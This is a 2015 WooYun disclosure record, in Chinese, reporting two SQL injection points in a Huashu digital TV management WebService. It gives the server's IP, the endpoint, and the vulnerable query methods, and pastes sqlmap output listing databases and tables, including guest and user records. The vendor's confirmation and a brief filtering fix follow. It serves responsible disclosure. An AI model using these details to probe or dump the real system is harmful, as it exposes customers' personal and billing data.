漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0151283
漏洞标题:华数数字电视管理系统WebService查询接口两处注射
相关厂商:华数数字电视传媒集团有限公司
漏洞作者: 一个小尼玛
提交时间:2015-11-02 15:23
修复时间:2015-12-18 14:16
公开时间:2015-12-18 14:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-03: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向核心白帽子及相关领域专家公开
2015-11-23: 细节向普通白帽子公开
2015-12-03: 细节向实习白帽子公开
2015-12-18: 细节向公众公开
简要描述:
华数数字电视管理系统WebService查询接口存在两处注射 暴露大约十万信息
详细说明:
http://218.108.234.212/DtvWebService/DtvWebService.asmx
查询接口
QueryLevel 查询机顶盒状态
OpenLevel 开通点播权限
两处存在注入
漏洞证明:
sqlmap 可跑
current user: 'cqz'
current database: 'DtvManage'
current user is DBA: False
available databases [8]:
[*] DtvManage
[*] master
[*] model
[*] msdb
[*] Northwind
[*] Phone
[*] pubs
[*] tempdb
Database: DtvManage
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.OptRecord | 127182 |
| dbo.ViewOptRecord | 97153 |
| dbo.ViewRealBill | 19302 |
| dbo.ViewDayBillCount | 5737 |
| dbo.GuestInfo | 3705 |
| dbo.ViewSTBIDInfo | 3705 |
| dbo.ViewGuestInfo | 930 |
| dbo.Users | 147 |
| dbo.ViewUser | 147 |
| dbo.sysconstraints | 41 |
| dbo.HotelCode | 31 |
| dbo.PayIni | 29 |
| dbo.ViewPayINI | 29 |
| dbo.UserLevel | 4 |
| dbo.syssegments | 3 |
+----------------------+---------+
修复方案:
过滤 接口同样很重要
版权声明:转载请注明来源 一个小尼玛@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-11-03 14:15
厂商回复:
正在处理
最新状态:
暂无